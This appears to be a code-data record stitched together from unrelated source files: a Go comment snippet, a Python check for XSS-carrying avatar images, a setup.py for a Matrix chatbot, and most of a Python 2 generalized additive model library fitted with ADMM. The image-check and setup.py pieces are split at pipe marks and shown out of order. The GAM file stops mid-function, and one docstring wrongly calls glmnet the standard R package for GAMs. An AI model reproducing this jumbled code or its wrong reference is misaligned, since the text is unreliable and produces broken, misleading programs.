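// if err := store.Set(&models.Client{ID: "abc", Secret: "s3cret", Domain: "https://example.com"}); err == nil {
// info, _ := store.GetByID("abc")
// fmt.Println(info.GetDomain())
// }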
XSSImageCheck.py | # -*- coding: utf-8 -*-
"""
@author: moloch
Copyright 2014
--------------------------------------------
Check for tricksy .gif and .bmp files
http://jklmnn.de/imagejs/
"""
import os
from string import printable
from tornado.options import options
from random import randint
MAX_AVATAR_SIZE = 1024 * 1024
MIN_AVATAR_SIZE = 64
IMG_FORMATS = ["png", "jpeg", "jpg", "gif", "bmp"]
def is_xss_image(data):
return all([char in printable for char in data[:16]])
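# Illustrative behaviour (assumed inputs, not from the original source):
# a polyglot "image" whose first bytes are plain ASCII, e.g. data starting
# with "GIF89a/*", is entirely printable, so is_xss_image() returns True
# (suspicious), while a real binary header such as "\x89PNG\r\n\x1a\n"
# contains non-printable bytes and returns False.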
def get_new_avatar(dir, forceteam=False): | if len(avatars) == 0:
return avatar
if dir == "team" or forceteam:
from models.Team import Team
cmplist = Team.all()
elif dir == "user":
from models.User import User
cmplist = User.all()
else:
from models.Box import Box
cmplist = Box.all()
dblist = []
for item in cmplist:
if item._avatar:
dblist.append(item._avatar)
for image in avatars:
if image not in dblist:
return image
return avatars[randint(0, len(avatars) - 1)]
def default_avatar(dir):
if dir == "team":
avatar = "default_team.jpg"
elif dir == "user":
avatar = "default_user.jpg"
else:
avatar = "default_box.jpg"
return avatar
def filter_avatars(dir):
avatars = os.listdir(options.avatar_dir + "/" + dir)
avatarlist = []
for avatar in avatars:
if avatar.lower().endswith(tuple(IMG_FORMATS)):
avatarlist.append(dir + "/" + avatar)
return avatarlist
def existing_avatars(dir):
avatars = []
if dir == "team":
from models.Team import Team
teams = Team.all()
for team in teams:
if team.avatar is not None and len(team.members) > 0:
avatars.append(team.avatar)
else:
from models.User import User
users = User.all()
for user in users:
if user.avatar is not None:
avatars.append(user.avatar)
return avatars | avatar = default_avatar(dir)
avatars = filter_avatars(dir) |
setup.py | from distutils.core import setup
DESC='A simple, extensible chatbot for Matrix'
setup(
name='python-matrix-gfyrslf', | author='Matt Stroud',
author_email='see github',
url='https://github.com/mstroud/python-matrix-gfyrslf',
packages=['python-matrix-gfyrslf'],
install_requires=['matrix_client'],
license='MIT',
description=DESC,
long_description=DESC,
) | version='0.1', |
gamdist.py | # Copyright 2017 Match Group, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License"); you
# may not use this file except in compliance with the License. You may
# obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied. See the License for the specific language governing
# permissions and limitations under the License.
#
# Passing untrusted user input may have unintended consequences. Not
# designed to consume input from unknown sources (i.e., the public
# internet).
#
# This file has been modified from the original release by Match Group
# LLC. A description of changes may be found in the change log
# accompanying this source code.
import sys
import pickle
import multiprocessing as mp
import numpy as np
import scipy.special as special
import scipy.stats as stats
import scipy.linalg as linalg
from matplotlib import pyplot as plt
from .feature import _Feature
from .categorical_feature import _CategoricalFeature
from .linear_feature import _LinearFeature
from .spline_feature import _SplineFeature
import proximal_operators as po
# To do:
# - Hierarchical models
# - Piecewise constant fits, total variation regularization
# - Monotone constraint
# - Implement overdispersion for Poisson family
# - Implement Multinomial, Proportional Hazards
# - Implement outlier detection
# - AICc, BIC, R-squared estimate
# - Confidence intervals on mu, predictions (probably need to use Bootstrap but can
# do so intelligently)
# - Confidence intervals on model parameters, p-values
# - Group lasso penalty (l2 norm -- not squared -- or l_\infty norm on f_j(x_j; p_j))
# - Interactions
# - Runtime optimization (Cython)
# - Fit in parallel
# - Residuals
# - Compute different types of residuals (Sec 3.1.7 of [GAMr])
# - Plot residuals against mean response, variance, predictor, unused predictor
# - QQ plot of residuals
#
# Done:
# - Implement Gaussian, Binomial, Poisson, Gamma, Inv Gaussian,
# - Plot splines
# - Deviance (on training set and test set), AIC, Dispersion, GCV, UBRE
# - Write documentation
# - Check implementation of Gamma dispersion
# - Implement probit, complementary log-log links.
# - Implement Binomial models for covariate classes
# - Constrain spline to have mean prediction 0 over the data
# - Save and load properly
# - Implement overdispersion for Binomial family
FAMILIES = ['normal',
'binomial',
'poisson',
'gamma',
'exponential',
'inverse_gaussian'
]
LINKS = ['identity',
'logistic',
'probit',
'complementary_log_log',
'log',
'reciprocal',
'reciprocal_squared'
]
FAMILIES_WITH_KNOWN_DISPERSIONS = {'binomial': 1,
'poisson': 1
}
CANONICAL_LINKS = {'normal': 'identity',
'binomial': 'logistic',
'poisson': 'log',
'gamma': 'reciprocal',
'inverse_gaussian': 'reciprocal_squared'
}
# Non-canonical but common link/family combinations include:
# Binomial: probit and complementary log-log
# Gamma: identity and log
def _plot_convergence(prim_res, prim_tol, dual_res, dual_tol, dev):
"""Plot convergence progress.
We deem the algorithm to have converged when the primal and dual
residuals are smaller than tolerances which are themselves computed
based on the data as in [ADMM]. Some analysts prefer to claim
convergence when changes to the deviance (a measure of goodness of
fit) become small. Thus we plot that as well. Specifically, we plot, on a log
scale, dev - dev_final, where dev_final is the deviance of the final
model. We add 1e-10 just to avoid taking the logarithm of zero, which
is completely arbitrary but makes the plot look acceptable.
Parameters
----------
prim_res : array
Array of primal residuals after each iteration.
prim_tol : array
Array of primal tolerances after each iteration.
dual_res : array
Array of dual residuals after each iteration.
dual_tol : array
Array of dual tolerances after each iteration.
dev : array
Array of deviances after each iteration
Returns
-------
(nothing)
"""
fig = plt.figure(figsize=(12., 10.))
ax = fig.add_subplot(211)
ax.plot(range(len(prim_res)), prim_res, 'b-', label='Primal Residual')
ax.plot(range(len(prim_tol)), prim_tol, 'b--', label='Primal Tolerance')
ax.plot(range(len(dual_res)), dual_res, 'r-', label='Dual Residual')
ax.plot(range(len(dual_tol)), dual_tol, 'r--', label='Dual Tolerance')
ax.set_yscale('log')
plt.xlabel('Iteration', fontsize=24)
plt.ylabel('Residual', fontsize=24)
plt.legend(fontsize=24, loc=3)
ax = fig.add_subplot(212)
ax.plot(range(len(dev)), (dev - dev[-1]) + 1e-10, 'b-', label='Deviance')
ax.set_yscale('log')
plt.xlabel('Iteration', fontsize=24)
plt.ylabel('Deviance Suboptimality', fontsize=24)
plt.gcf().subplots_adjust(bottom=0.1)
plt.gcf().subplots_adjust(left=0.1)
plt.show()
def _feature_wrapper(f):
"""Wrapper for feature optimization.
This is a wrapper for use with multi-threaded versions.
Unfortunately Python threads are *terrible*, so this doesn't
actually get used.
Parameters
------
f : list
Array of inputs. f[0] is the name of the feature. f[1]
is the feature object itself. f[2] is N * fpumz (the
vector input to the feature during optimization). f[3]
is the ADMM parameter, rho.
Returns
-------
name : str
The name of the feature. (The same as the input.)
f_j : array
The array of fitted values returned by the feature.
"""
return f[0], f[1].optimize(f[2], f[3])
def _gamma_dispersion(dof, dev, num_obs):
"""Gamma dispersion.
This function estimates the dispersion of a Gamma family with p
degrees of freedom and deviance D, and n observations. The
dispersion nu is that number satisfying
2*n * (log nu - psi(nu)) - p / nu = D
We use Newton's method with a learning rate to solve this nonlinear
equation.
Parameters
----------
dof : float
Degrees of freedom
dev : float
Deviance
num_obs : int
Number of observations
Returns
-------
nu : float
Estimated dispersion
"""
beta = 0.1
tol = 1e-6
max_its = 100
nu = 1.
for i in range(max_its):
num = 2. * num_obs * (np.log(nu) - special.psi(nu)) - dof / nu - dev
denom = 2. * num_obs * (1. / nu - special.polygamma(1, nu)) + dof / (nu * nu)
dnu = num / denom
nu -= dnu * beta
if abs(dnu) < tol:
return nu
else:
raise ValueError('Could not estimate gamma dispersion.')
class GAM:
def __init__(self, family=None, link=None, dispersion=None,
estimate_overdispersion=False, name=None,
load_from_file=None):
"""Generalized Additive Model
This is the constructor for a Generalized Additive Model.
References
----------
[glmnet] glmnet (R package):
https://cran.r-project.org/web/packages/glmnet/index.html
This is the standard package for GAMs in R and was written by people
much smarter than I am!
[pygam] pygam (Python package): https://github.com/dswah/pyGAM
This is a library in Python that does basically the same thing as this
script, but in a different way (not using ADMM).
[GLM] Generalized Linear Models by McCullagh and Nelder
The standard text on GLMs.
[GAM] Generalized Additive Models; by Hastie and Tibshirani
The book by the folks who invented GAMs.
[ESL] The Elements of Statistical Learning; by Hastie, Tibshirani, and
Friedman. Covers a lot more than just GAMs.
[GAMr] Generalized Additive Models: an Introduction with R; by Wood.
Covers more implementation details than [GAM].
[ADMM] Distributed Optimization and Statistical Learning via the Alternating
Direction Method of Multipliers; by Boyd, Parikh, Chu, Peleato, and
Eckstein. A mouthful, a work of genius.
[GAMADMM] A Distributed Algorithm for Fitting Generalized Additive Models;
by Chu, Keshavarz, and Boyd
Forms the basis of our approach, the inspiration for this package!
Parameters
----------
family : str or None (default None)
Family of the model. Currently supported families include:
'normal' (for continuous responses),
'binomial' (for binary responses),
'poisson' (for counts),
'gamma' (still in progress),
'inverse_gaussian' (still in progress).
Not currently supported families that could be supported
include Multinomial models (ordinal and nominal) and
proportional hazards models. Required unless loading an
existing model from file (see load_from_file).
link : str or None (optional)
Link function associated with the model. Supported link
functions include:
Link Canonical For Family
'identity' 'normal'
'logistic' 'binomial'
'log' 'poisson'
'reciprocal' 'gamma'
'reciprocal_squared' 'inverse_gaussian'
Non-canonical 'probit' and 'complementary_log_log' links
are also supported (typically with 'binomial'). If not
specified, the canonical link will be used, but non-
canonical links are still permitted. Certain link/family
combinations result in a non-convex problem and
convergence is not guaranteed.
dispersion : float or None (optional)
Dispersion parameter associated with the model. Certain
families (binomial, poisson) have dispersion independent
of the data. Specifying the dispersion for these families
does nothing. In other instances, the dispersion is
typically unknown and must be estimated from the data.
If the dispersion is known, it can be specified here which
will reduce the uncertainty of the model.
estimate_overdispersion : boolean (optional)
Flag specifying whether to estimate over-dispersion for
Binomial and Poisson (not yet implemented) families. Is
only possible when covariate classes are present and have
at least modest size. See [GLM, S4.5] for
details. Defaults to False.
name : str or None (optional)
Name for model, to be used in plots and in saving files.
load_from_file : str or None (optional)
This module uses an iterative approach to fitting models.
For complicated models with lots of data, each iteration
can take a long time (though the number of iterations is
typically less than 100). If the user wishes to pause
after the end of an iteration, they can pick up where
the left off by saving results (see the save_flag in .fit)
and loading them to start the next iterations. Specifying
this option supersedes all other parameters.
Returns
-------
mdl : Generalized Additive Model object
"""
if load_from_file is not None:
self._load(load_from_file)
return
if family is None:
raise ValueError('Family not specified.')
elif family not in FAMILIES:
raise ValueError('{} family not supported'.format(family))
elif family == 'exponential':
# Exponential is a special case of Gamma with a dispersion of 1.
self._family = 'gamma'
dispersion = 1.
else:
self._family = family
if link is None:
self._link = CANONICAL_LINKS[family]
elif link in LINKS:
self._link = link
else:
raise ValueError('{} link not supported'.format(link))
if dispersion is not None:
self._known_dispersion = True
self._dispersion = dispersion
elif (self._family in FAMILIES_WITH_KNOWN_DISPERSIONS.keys()
and not estimate_overdispersion):
self._known_dispersion = True
self._dispersion = FAMILIES_WITH_KNOWN_DISPERSIONS[self._family]
else:
self._known_dispersion = False
if self._link == 'identity':
self._eval_link = lambda x: x
self._eval_inv_link = lambda x: x
elif self._link == 'logistic':
self._eval_link = lambda x: np.log( x / (1. - x) )
self._eval_inv_link = lambda x: np.exp(x) / (1 + np.exp(x))
elif self._link == 'probit':
# Inverse CDF of the Gaussian distribution
self._eval_link = lambda x: stats.norm.ppf(x)
self._eval_inv_link = lambda x: stats.norm.cdf(x)
elif self._link == 'complementary_log_log':
self._eval_link = lambda x: np.log(-np.log(1. - x))
self._eval_inv_link = lambda x: 1. - np.exp(-np.exp(x))
elif self._link == 'log':
self._eval_link = lambda x: np.log(x)
self._eval_inv_link = lambda x: np.exp(x)
elif self._link == 'reciprocal':
self._eval_link = lambda x: 1. / x
self._eval_inv_link = lambda x: 1. / x
elif self._link == 'reciprocal_squared':
self._eval_link = lambda x: 1. / (x * x)
self._eval_inv_link = lambda x: 1. / np.sqrt(x)
self._estimate_overdispersion = estimate_overdispersion
self._features = {}
self._offset = 0.0
self._num_features = 0
self._fitted = False
self._name = name
def _save(self):
"""Save state.
Save the model to file to make predictions later, or continue
a fitting session.
"""
mv = {}
mv['family'] = self._family
mv['link'] = self._link
mv['known_dispersion'] = self._known_dispersion
if self._known_dispersion:
mv['dispersion'] = self._dispersion
mv['estimate_overdispersion'] = self._estimate_overdispersion
mv['offset'] = self._offset
mv['num_features'] = self._num_features
mv['fitted'] = self._fitted
mv['name'] = self._name
features = {}
for name, feature in self._features.iteritems():
features[name] = {'type': feature.__type__,
'filename': feature._filename
}
mv['features'] = features
# mv['rho'] = self._rho
mv['num_obs'] = self._num_obs
mv['y'] = self._y
mv['weights'] = self._weights
mv['has_covariate_classes'] = self._has_covariate_classes
if self._has_covariate_classes:
mv['covariate_class_sizes'] = self._covariate_class_sizes
mv['f_bar'] = self.f_bar
mv['z_bar'] = self.z_bar
mv['u'] = self.u
mv['prim_res'] = self.prim_res
mv['dual_res'] = self.dual_res
mv['prim_tol'] = self.prim_tol
mv['dual_tol'] = self.dual_tol
mv['dev'] = self.dev
filename = '{0:s}_model.pckl'.format(self._name)
f = open(filename, 'wb')
pickle.dump(mv, f)
f.close()
def _load(self, filename):
"""Load state.
Load a model from file to make predictions.
"""
f = open(filename, 'rb')
mv = pickle.load(f)
f.close()
self._filename = filename
self._family = mv['family']
self._link = mv['link']
self._known_dispersion = mv['known_dispersion']
if self._known_dispersion:
self._dispersion = mv['dispersion']
self._estimate_overdispersion = mv['estimate_overdispersion']
self._offset = mv['offset']
self._num_features = mv['num_features']
self._fitted = mv['fitted']
self._name = mv['name']
self._features = {}
features = mv['features']
for (name, feature) in features.iteritems():
if feature['type'] == 'categorical':
self._features[name] = _CategoricalFeature(load_from_file=feature['filename'])
elif feature['type'] == 'linear':
self._features[name] = _LinearFeature(load_from_file=feature['filename'])
elif feature['type'] == 'spline':
self._features[name] = _SplineFeature(load_from_file=feature['filename'])
else:
raise ValueError('Invalid feature type')
# self._rho = mv['rho']
self._num_obs = mv['num_obs']
self._y = mv['y']
self._weights = mv['weights']
self._has_covariate_classes = mv['has_covariate_classes']
if self._has_covariate_classes:
self._covariate_class_sizes = mv['covariate_class_sizes']
self.f_bar = mv['f_bar']
self.z_bar = mv['z_bar']
self.u = mv['u']
self.prim_res = mv['prim_res']
self.dual_res = mv['dual_res']
self.prim_tol = mv['prim_tol']
self.dual_tol = mv['dual_tol']
self.dev = mv['dev']
if self._link == 'identity':
self._eval_link = lambda x: x
self._eval_inv_link = lambda x: x
elif self._link == 'logistic':
self._eval_link = lambda x: np.log( x / (1. - x) )
self._eval_inv_link = lambda x: np.exp(x) / (1 + np.exp(x))
elif self._link == 'probit':
# Inverse CDF of the Gaussian distribution
self._eval_link = lambda x: stats.norm.ppf(x)
self._eval_inv_link = lambda x: stats.norm.cdf(x)
elif self._link == 'complementary_log_log':
self._eval_link = lambda x: np.log(-np.log(1. - x))
self._eval_inv_link = lambda x: 1. - np.exp(-np.exp(x))
elif self._link == 'log':
self._eval_link = lambda x: np.log(x)
self._eval_inv_link = lambda x: np.exp(x)
elif self._link == 'reciprocal':
self._eval_link = lambda x: 1. / x
self._eval_inv_link = lambda x: 1. / x
elif self._link == 'reciprocal_squared':
self._eval_link = lambda x: 1. / (x * x)
self._eval_inv_link = lambda x: 1. / np.sqrt(x)
def add_feature(self, name, type, transform=None, rel_dof=None, regularization=None):
"""Add a feature
Add a feature to a Generalized Additive Model. (An implicit
constant feature is always included, representing the overall
average response.)
Parameters
----------
name : str
Name for feature. Used internally to keep track of
features and is also used when saving files and in
plots.
type : str
Type of feature. Currently supported options include:
'categorical' (for categorical variables)
'linear' (for variables with a linear contribution
to the response)
'spline' (for variables with a potentially nonlinear
contribution to the response).
Other types of features worth supporting include
piecewise constant functions and monotonic functions.
Those might end up being regularization terms.
transform : function or None
Optional transform applied to feature data, saving
the user from repetitive boilerplate code. Any function
may be used; it is applied to data provided during fitting
and prediction. Common options might include np.log, np.log1p,
or np.sqrt. The user may wish to start with a base feature
like 'age' and use derived features 'age_linear', 'age_quadratic'
to permit quadratic models for that feature, with potentially
different regularization applied to each.
rel_dof : float or None
Relative degrees of freedom. Applicable only to spline features.
The degrees of freedom associated with a spline represent how
"wiggly" it is allowed to be. A spline with two degrees of freedom
is just a line. (Actually, since these features are constrained
to have zero mean response over the data, linear features
only have one degree of freedom.) The relative degrees of freedom
are used to specify the baseline smoothing parameter (lambda)
associated with a feature. When the model is fit to data, the user
can specify an overall smoothing parameter applied to all features
to alter the amount of regularization in the entire model. Thus
the actual degrees of freedom will vary based on the amount of
smoothing. The idea is that the analyst may wish to permit some
features to be more wiggly than others. By default, all
splines have 4 relative degrees of freedom.
Regularization of any feature effectively reduces the degrees of
freedom, and so this term is potentially applicable, but that is
not yet supported.
regularization : dictionary or None
Dictionary specifying the regularization applied to this feature.
Different types of features support different types of regularization.
Splines implicitly only support regularization of the wiggliness
via a C2 smoothness penalty. That is controlled via the rel_dof.
Other features have more diverse options described in their own
documentation.
Returns
-------
(nothing)
"""
if type == 'categorical':
f = _CategoricalFeature(name, regularization=regularization)
elif type == 'linear':
f = _LinearFeature(name, transform, regularization=regularization)
elif type == 'spline':
f = _SplineFeature(name, transform, rel_dof)
else:
raise ValueError('Features of type {} not supported.'.format(type))
self._features[name] = f
self._num_features += 1
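# Illustrative model-building sketch (assumed feature names and data;
# not from the original source):
# mdl = GAM(family='binomial', name='survival')
# mdl.add_feature('age', 'spline', transform=np.log1p, rel_dof=4)
# mdl.add_feature('country', 'categorical')
# mdl.fit(X, y, verbose=True)
# mu = mdl.predict(X_new)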
def fit(self, X, y, covariate_class_sizes=None, weights=None,
optimizer='admm', smoothing=1., save_flag=False,
verbose=False, plot_convergence=False, max_its=100):
"""Fit a Generalized Additive Model to data.
Note regarding binomial families: many data sets include
multiple observations having identical features. For example,
imagine a data set with features 'gender', and 'country' and
binary response indicating whether the person died (morbid but
common in biostatistics). The data might look like this:
gender country patients survivors
M USA 50 48
F USA 70 65
M CAN 40 38
F CAN 45 43
This still describes a binomial family, but in a more compact
format than specifying each individual user. We eventually
want to support this more compact format, but we do not
currently! In this context, it is important to check for
over-dispersion (see [GLM]), and I need to learn more first.
In the current implementation, we assume that there is no
over-dispersion, and that the number of users having the
same set of features is small.
Parameters
----------
X : pandas dataframe
Dataframe of features. The column names must correspond
to the names of features added to the model. X may have
extra columns corresponding to features not included in
the model; these are simply ignored. Where applicable,
the data should be "pre-transformation", since this code
will apply any transformations specified in .add_feature.
y : array
Response. Depending on the model family, the response
may need to be in a particular form (for example, for
a binomial family, the y's should be either 0 or 1),
but this is not checked anywhere!
covariate_class_sizes : array or None.
If observations are grouped into covariate classes, the
size of those classes should be listed in this input.
weights : array or None
Weights applied to each observation. This is effectively
specifying the dispersion of each observation.
optimizer : string
We use the Alternating Direction Method of Multipliers
('admm') to fit the model. We may eventually support more
methods, but right now this option does nothing.
smoothing : float
Smoothing to apply to entire model, used in conjunction
with other regularization parameters. That is, whatever
regularization is used for the various features, is
scaled by this term, allowing the user to set the overall
smoothing by Cross Validation or whatever they like. This
allows the user to specify different regularization for
each feature, while still permitting a one-dimensional
family of models corresponding to different amounts of
regularization. Defaults to 1., leaving the regularization
as specified in .add_feature().
save_flag : boolean
Specifies whether to save intermediate results after each
iteration. Useful for complicated models with massive
data sets that take a while to fit. If the system crashes
during the fit, the analyst can pick up where they left
off instead of starting from scratch. Defaults to False.
verbose : boolean
Specifies whether to print mildly useful information to
the screen during the fit. Defaults to False.
plot_convergence : boolean
Specifies whether to plot the convergence graph at the
end. (I suspect only Convex Optimization nerds like me
want to see this.) Defaults to False.
max_its : integer
Maximum number of iterations. Defaults to 100.
Returns
-------
(nothing)
"""
if save_flag and self._name is None:
msg = 'Cannot save a GAM with no name.'
msg += ' Specify name when instantiating model.'
raise ValueError(msg)
if len(X) != len(y):
raise ValueError('Inconsistent number of observations in X and y.')
num_threads = 1
self._rho = 0.1
eps_abs = 1e-3
eps_rel = 1e-3
# Note that X may include columns that do not correspond to features in our model
# (for example, if the user is experimenting with leaving out features to assess
# importance). Thus, the real number of features is self._num_features, not
# num_features as in the next line.
self._num_obs, num_features = X.shape
self._y = y.flatten()
self._weights = weights
if covariate_class_sizes is not None:
self._has_covariate_classes = True
self._covariate_class_sizes = covariate_class_sizes
mean_response = float(np.sum(self._y)) / np.sum(self._covariate_class_sizes)
self._offset = self._eval_link(mean_response)
else:
self._has_covariate_classes = False
self._covariate_class_sizes = None
self._offset = self._eval_link(np.mean(self._y))
fj = {}
for name, feature in self._features.iteritems():
feature.initialize(X[name].values, smoothing=smoothing,
covariate_class_sizes=self._covariate_class_sizes,
save_flag=save_flag, save_prefix=self._name)
fj[name] = np.zeros(self._num_obs)
self.f_bar = np.full((self._num_obs,), self._offset / self._num_features)
self.z_bar = np.zeros(self._num_obs)
self.u = np.zeros(self._num_obs)
self.prim_res = []
self.dual_res = []
self.prim_tol = []
self.dual_tol = []
self.dev = []
z_new = np.zeros(self._num_obs)
if num_threads > 1:
p = mp.Pool(num_threads)
else:
p = None
for i in range(max_its):
if verbose:
print 'Iteration {0:d}'.format(i)
print 'Optimizing primal variables'
fpumz = self._num_features * (self.f_bar + self.u - self.z_bar)
fj_new = {}
f_new = np.full((self._num_obs,), self._offset)
if False: #num_threads > 1:
# Getting python to run a for loop in parallel
# might as well be impossible :-(
args = [(i, self._features[i], fpumz, self._rho) for i in self._features.keys()]
results = p.map(_feature_wrapper, args)
for i in results:
fj_new[i[0]] = i[1]
f_new += i[1]
else:
for name, feature in self._features.iteritems():
if verbose:
print 'Optimizing {0:s}'.format(name)
fj_new[name] = feature.optimize(fpumz, self._rho)
f_new += fj_new[name]
f_new /= self._num_features
if verbose:
print 'Optimizing dual variables'
z_new = self._optimize(self.u + f_new, self._num_features, p)
self.u += f_new - z_new
prim_res = np.sqrt(self._num_features) * linalg.norm(f_new - z_new)
dual_res = 0.0
norm_ax = 0.0
norm_bz = 0.0
norm_aty = 0.0
num_params = 0
for name, feature in self._features.iteritems():
dr = ((fj_new[name] - fj[name])
+ (z_new - self.z_bar)
- (f_new - self.f_bar))
dual_res += dr.dot(dr)
norm_ax += fj_new[name].dot(fj_new[name])
zik = fj_new[name] + z_new - f_new
norm_bz += zik.dot(zik)
norm_aty += feature.compute_dual_tol(self.u)
num_params += feature.num_params()
dual_res = self._rho * np.sqrt(dual_res)
norm_ax = np.sqrt(norm_ax)
norm_bz = np.sqrt(norm_bz)
norm_aty = np.sqrt(norm_aty)
self.f_bar = f_new
fj = fj_new
self.z_bar = z_new
if self._has_covariate_classes:
sccs = np.sum(self._covariate_class_sizes)
prim_tol = (np.sqrt(sccs * self._num_features) * eps_abs
+ eps_rel * np.max([norm_ax, norm_bz]))
else:
prim_tol = (np.sqrt(self._num_obs * self._num_features) * eps_abs
+ eps_rel * np.max([norm_ax, norm_bz]))
dual_tol = np.sqrt(num_params) * eps_abs + eps_rel * norm_aty
self.prim_res.append(prim_res)
self.dual_res.append(dual_res)
self.prim_tol.append(prim_tol)
self.dual_tol.append(dual_tol)
self.dev.append(self.deviance())
if prim_res < prim_tol and dual_res < dual_tol:
if verbose:
print 'Fit converged'
break
else:
if verbose:
print 'Fit did not converge'
if num_threads > 1:
p.close()
p.join()
self._fitted = True
if save_flag:
self._save()
if plot_convergence:
_plot_convergence(self.prim_res, self.prim_tol, self.dual_res,
self.dual_tol, self.dev)
def _optimize(self, upf, N, p=None):
"""Optimize \bar{z}.
Solves the optimization problem:
minimize L(N*z) + \rho/2 * \| N*z - N*u - N*\bar{f} \|_2^2
where z is the variable, N is the number of features, u is the scaled
dual variable, \bar{f} is the average feature response, and L is
the likelihood function which is different depending on the
family and link function. This is accomplished via a proximal
operator, as discussed in [GAMADMM]:
prox_\mu(v) := argmin_x L(x) + \mu/2 * \| x - v \|_2^2
I strongly believe that paper contains a typo in this equation, so we
return (1. / N) * prox_\mu(N * (u + \bar{f})) with \mu = \rho instead
of \mu = \rho / N as in [GAMADMM]. When implemented as in the paper,
convergence was much slower, but it did still converge.
Certain combinations of family and link function result in proximal
operators with closed form solutions, making this step *very* fast
(e.g. 3 flops per observation).
Parameters
----------
upf : array
Vector representing u + \bar{f}
N : integer
Number of features.
p : Multiprocessing Pool (optional)
If multiple threads are available, massive data sets may
benefit from solving this optimization problem in parallel.
It is up to the individual functions to decide whether to
actually do this.
Returns
-------
z : array
Result of the above optimization problem.
"""
prox = None
if self._family == 'normal':
if self._link == 'identity':
prox = po._prox_normal_identity
else:
prox = po._prox_normal
elif self._family == 'binomial':
if self._link == 'logistic':
prox = po._prox_binomial_logit
else:
prox = po._prox_binomial
if self._has_covariate_classes:
return (1. / N) * prox(N*upf, self._rho, self._y,
self._covariate_class_sizes,
self._weights, self._eval_inv_link, p=p)
elif self._family == 'poisson':
if self._link == 'log':
prox = po._prox_poisson_log
else:
prox = po._prox_poisson
elif self._family == 'gamma':
if self._link == 'reciprocal':
prox = po._prox_gamma_reciprocal
else:
prox = po._prox_gamma
elif self._family == 'inverse_gaussian':
if self._link == 'reciprocal_squared':
prox = po._prox_inv_gaussian_reciprocal_squared
else:
prox = po._prox_inv_gaussian
else:
msg = 'Family {0:s} and Link Function {1:s} not (yet) supported.'
raise ValueError(msg.format(self._family, self._link))
return (1. / N) * prox(N*upf, self._rho, self._y, w=self._weights,
inv_link=self._eval_inv_link, p=p)
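# For reference, a standard closed form (not taken from proximal_operators):
# for the normal family with identity link, L(x) = 0.5 * ||x - y||_2^2, so
# prox_rho(v) = argmin_x L(x) + rho/2 * ||x - v||_2^2 = (y + rho * v) / (1. + rho),
# the kind of ~3-flops-per-observation update mentioned in the docstring.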
def predict(self, X):
"""Apply fitted model to features.
Parameters
----------
X : pandas dataframe
Data for which we wish to predict the response. The
column names must correspond to the names of the
features used to fit the model. X may have extra
columns corresponding to features not in the model;
these are simply ignored. Where applicable, the data
should be "pre-transformation", since this code will
apply any transformations specified while defining
the model.
Returns
-------
mu : array
Predicted mean response for each data point.
"""
if not self._fitted:
raise AttributeError('Model not yet fit.')
num_points, m = X.shape
eta = np.full((num_points,), self._offset)
for name, feature in self._features.iteritems():
eta += feature.predict(X[name].values)
return self._eval_inv_link(eta)
def confidence_intervals(self, X, prediction=False, width=0.95):
"""Confidence intervals on predictions.
NOT YET IMPLEMENTED
There are two notions of confidence intervals that are
appropriate. The first is a confidence interval on mu,
the mean response. This follows from the uncertainty
associated with the fit model. The second is a confidence
interval on observations of this model. The distinction
is best understood by example. For a Gaussian family,
the model might be a perfect fit to the data, and we
may have billions of observations, so we know mu perfectly.
Confidence intervals on the mean response would be very
small. But the response is Gaussian with a non-zero
variance, so observations will in general still be spread
around the mean response. A confidence interval on the
prediction would be larger.
Now consider a binomial family. The estimated mean response
will be some number between 0 and 1, and we can estimate
a confidence interval for that mean. But the observed
response is always either 0 or 1, so it doesn't make sense
to talk about a confidence interval on the prediction
(except in some pedantic sense perhaps).
Note that if we are making multiple predictions, it makes
sense to talk about a "global" set of confidence intervals.
Such a set has the property that *all* predictions fall
within their intervals with specified probability. This
function does not compute global confidence intervals!
Instead each confidence interval is computed "in vacuo".
Parameters
----------
X : pandas dataframe
Data for which we wish to predict the response. The
column names must correspond to the names of the
features used to fit the model. X may have extra
columns corresponding to features not in the model;
these are simply ignored. Where applicable, the data
should be "pre-transformation", since this code will
apply any transformations specified while defining
the model.
prediction : boolean
Specifies whether to return a confidence interval
on the mean response or on the predicted response.
(See above.) Defaults to False, leading to a
confidence interval on the mean response.
width : float between 0 and 1
Desired confidence width. Defaults to 0.95.
Returns
-------
mu : (n x 2) array
Lower and upper bounds on the confidence interval
associated with each prediction.
"""
pass
def plot(self, name, true_fn=None):
"""Plot the component of the modelf for a particular feature.
Parameters
----------
name : str
Name of feature (must be a feature in the model).
true_fn : function or None (optional)
Function representing the "true" relationship
between the feature and the response.
Returns
-------
(nothing)
"""
self._features[name]._plot(true_fn=true_fn)
def deviance(self, X=None, y=None, covariate_class_sizes=None, w=None):
"""Deviance
This function works in one of two ways:
Firstly, it computes the deviance of the model, defined as
2 * \phi * (\ell(y; y) - \ell(\mu; y))
where \phi is the dispersion (which is only in this equation
to cancel out the denominator of the log-likelihood),
\ell(y; y) is the log-likelihood of the model that fits the
data perfectly, and \ell(\mu; y) is the log-likelihood of the
fitted model on the data used to fit the model. This is
the quantity we minimize when fitting the model.
Secondly, it computes the deviance of the model on arbitrary
data sets. This can be used in conjunction with Cross Validation
to choose the smoothing parameter by minimizing the deviance
on the hold-out set.
Parameters
----------
X : pandas dataframe (optional)
Dataframe of features. The column names must correspond
to the names of features added to the model. (See .predict()).
Only applicable for the second use case described above.
y : array (optional)
Response. Only applicable for the second use case.
covariate_class_sizes : array (optional)
Array of covariate class sizes.
w : array (optional)
Weights for observations. Only applicable for the second
use case, but optional even then.
Returns
-------
D : float
The deviance of the model.
"""
if X is None or y is None:
y = self._y
mu = self._eval_inv_link(self._num_features * self.f_bar)
w = self._weights
if self._has_covariate_classes:
m = self._covariate_class_sizes
else:
m = 1.
else:
mu = self.predict(X)
# Use the provided class sizes when given; otherwise each
# observation is its own covariate class of size 1.
if covariate_class_sizes is not None:
m = covariate_class_sizes
else:
m = 1.
if self._family == 'normal':
y_minus_mu = y - mu
if w is None:
return y_minus_mu.dot(y_minus_mu)
else:
return w.dot(y_minus_mu * y_minus_mu)
elif self._family == 'binomial':
if w is None:
return -2. * np.sum( y * np.log(mu) + (m - y) * np.log1p(-mu) )
else:
return -2. * w.dot( y * np.log(mu) + (m - y) * np.log1p(-mu) )
elif self._family == 'poisson':
if w is None:
